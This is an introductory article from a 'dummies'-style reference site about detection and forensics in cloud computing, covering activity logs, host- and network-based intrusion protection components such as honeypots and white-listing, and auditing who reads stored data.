Detection and Forensics in Cloud Computing - dummies

Detection and Forensics in Cloud Computing

By Judith Hurwitz, Robin Bloor, Marcia Kaufman, Fern Halper

Cloud computing service providers each have their own way of managing security. There are three specific groups of IT security products — activity logs, host-based intrusion protection systems and network-based intrusion protection systems, and data audit.

Activity logs as cloud computing security

Many logging capabilities are included in operating systems, applications, databases, and devices such as hardware firewalls and network monitors. It costs to invoke logging capabilities: Turning on logging requires the system to write log records constantly, and it also involves managing and archiving such data until it’s no longer needed.

Log files often provide some evidence of how fraud was perpetrated, however. Perpetrators of digital fraud often escape justice simply because the victim doesn’t have sufficient evidence to prove what they did.

HIPS and NIPS as cloud computing security

Companies that would like to see a cloud service provider take over their internal platform and infrastructure services need to take a careful look at infrastructure protection.

Host-based intrusion protection systems (HIPS) and network-based intrusion protection systems (NIPS) are the same thing: a collection of capabilities that make it tough to penetrate a network.

HIPS and NIPS can include the following elements:

  • System and log-file monitors: This software looks for traces of hackers in log files. The monitors can watch login accounts, for example, and issue alerts when account permissions change — often an indication that something untoward is going on.

  • Network intrusion-detection systems (NIDS): These security programs monitor data packets that travel through a network, looking for any telltale signs of hacker activity. The effectiveness of a NIDS depends on whether it can sort real dangers from harmless threats and from legitimate activity. An ineffective NIDS raises too many false alarms and, thus, wastes time.

  • Digital deception software: This software deliberately misleads anyone who’s attempting to attack the IT network. It can range from the simple spoofing of various service names to setting up traps known as honeypots or honeynets.

    Setting security traps is unusual and can be expensive. It’s normally done by government sites or by companies that suspect digital industrial espionage.

  • White-listing software: This software inventories valid executable programs running on a computer and prevents any other executables from running. White-listing severely hampers hackers, because even if they access a computer, they can’t upload their own software to run on it. White-listing software reports on any attempt to run unauthenticated software. It also stops virus software stone dead.

  • Unified threat management: This central function takes information from all the preceding components and identifies threats by analyzing the combined information.

Data audit as cloud computing security

Although databases do log the name of the individual who changed data, they normally don’t log who read any piece of data. But read data is easily stolen. If you plan on storing data in a cloud environment, you must address this issue.